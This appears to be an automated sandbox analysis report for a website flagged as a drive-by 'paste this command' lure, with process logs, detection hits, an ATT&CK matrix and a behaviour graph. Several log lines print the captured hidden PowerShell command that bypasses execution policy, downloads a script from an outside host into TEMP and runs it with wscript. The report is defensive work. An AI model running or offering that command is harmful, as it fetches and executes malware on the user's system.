                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7281Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2601Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2199Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7633Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1906Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2465Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2548Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 1906 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 2465 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFF7B023038 GetSystemInfo,15_2_00007FFF7B023038
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi64_1124.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi64_5088.amsi.csv, type: OTHER
                    Source: Yara matchFile source: dropped/chromecache_240, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, type: DROPPED
                    Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
                    Bypasses PowerShell execution policy
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=Join-Path $env:TEMP \'x.js\';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList \'//nologo\',$p -WindowStyle Hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=Join-Path C:\Users\user\AppData\Local\Temp \'x.js\';try{(New-Object Net.WebClient).DownloadFile(,);Start-Process wscript -ArgumentList \'//nologo\', -WindowStyle Hidden}catch{}"Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -w hidden -c "$l=\'https://coreun.com/wp-content/d5\';$p=join-path $env:temp \'x.js\';try{(new-object net.webclient).downloadfile($l,$p);start-process wscript -argumentlist \'//nologo\',$p -windowstyle hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=join-path c:\users\user\appdata\local\temp \'x.js\';try{(new-object net.webclient).downloadfile(,);start-process wscript -argumentlist \'//nologo\', -windowstyle hidden}catch{}"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ep bypass -w hidden -c "=\'https://coreun.com/wp-content/d5\';=join-path c:\users\user\appdata\local\temp \'x.js\';try{(new-object net.webclient).downloadfile(,);start-process wscript -argumentlist \'//nologo\', -windowstyle hidden}catch{}"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		1
                    Drive-by Compromise                    		1
                    Command and Scripting Interpreter                    		2
                    Browser Extensions                    		11
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    PowerShell                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		21
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    DLL Side-Loading                    		Logon Script (Windows)11
                    Process Injection                    		Security Account Manager21
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Obfuscated Files or Information                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture5
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1708553 URL: https://www.elevate.inc/our-story Startdate: 06/06/2025 Architecture: WINDOWS Score: 100 38 Suricata IDS alerts for network traffic 2->38 40 Sigma detected: Powershell download and execute file 2->40 42 Detect drive by download via clipboard copy & paste 2->42 44 9 other signatures 2->44 6 powershell.exe 16 2->6         started        10 powershell.exe 11 2->10         started        12 chrome.exe 2 2->12         started        15 chrome.exe 2->15         started        process3 dnsIp4 26 \Device\ConDrv, ASCII 6->26 dropped 28 C:\Users\user\...\ConsoleHost_history.txt, ASCII 6->28 dropped 46 Suspicious powershell command line found 6->46 48 Tries to download and execute files (via powershell) 6->48 17 powershell.exe 7 6->17         started        19 conhost.exe 1 6->19         started        21 conhost.exe 10->21         started        36 192.168.2.16, 138, 443, 49169 unknown unknown 12->36 23 chrome.exe 12->23         started        file5 signatures6 process7 dnsIp8 30 www.elevate.inc 23->30 32 user.elevateaccounts.com 18.161.156.81, 443, 49722 MIT-GATEWAYSUS United States 23->32 34 67 other IPs or domains 23->34

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.